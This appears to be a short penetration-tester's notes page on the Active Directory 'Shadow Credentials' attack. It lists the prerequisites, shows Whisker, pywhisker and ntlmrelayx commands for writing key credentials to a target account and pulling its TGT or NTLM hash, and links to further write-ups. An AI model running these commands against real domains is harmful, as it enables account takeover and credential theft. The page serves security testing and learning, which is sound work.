Before jumping into exploiting Shadow Credentials, I highly recommend reading the article from SpecterOps on shadow credentials.
There are three prerequisites for this attack to be performed:
- The ability to write to the
msDS-KeyCredentialLinkattribute on the target. - AD CS must be configured.
- A DC on the domain must be configured to support PKINIT.
After identifying a user account or machine account where the msDS-KeyCredentialLink attribute can be written to, Whisker can be used to essentially automate the exploitation from a Windows machine:
# Generic usage of Whisker
Whisker.exe add /target:parzival
## https://github.com/ShutdownRepo/pywhisker
# Generic usage of PyWhisker
pywhisker.py -d $domain -u $user -p $password --target $target --action "list"xFollowing running Whisker, it will provide a Rubeus command that can be executed in order to pull the targets TGT or NTLM hash.
Ntlmrelayx also supports exploiting shadow credentials and can be used as follows:
# Relaying will work against either LDAP or LDAPS
# LDAPS
ntlmrelayx -t ldaps://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'
# LDAP
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'
## Failing to specify the --shadow-target will attempt to obtain a hash for the relayed user.
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials{% embed url="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials" %}
{% embed url="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" %}
{% embed url="https://pentestlab.blog/2022/02/07/shadow-credentials/" %}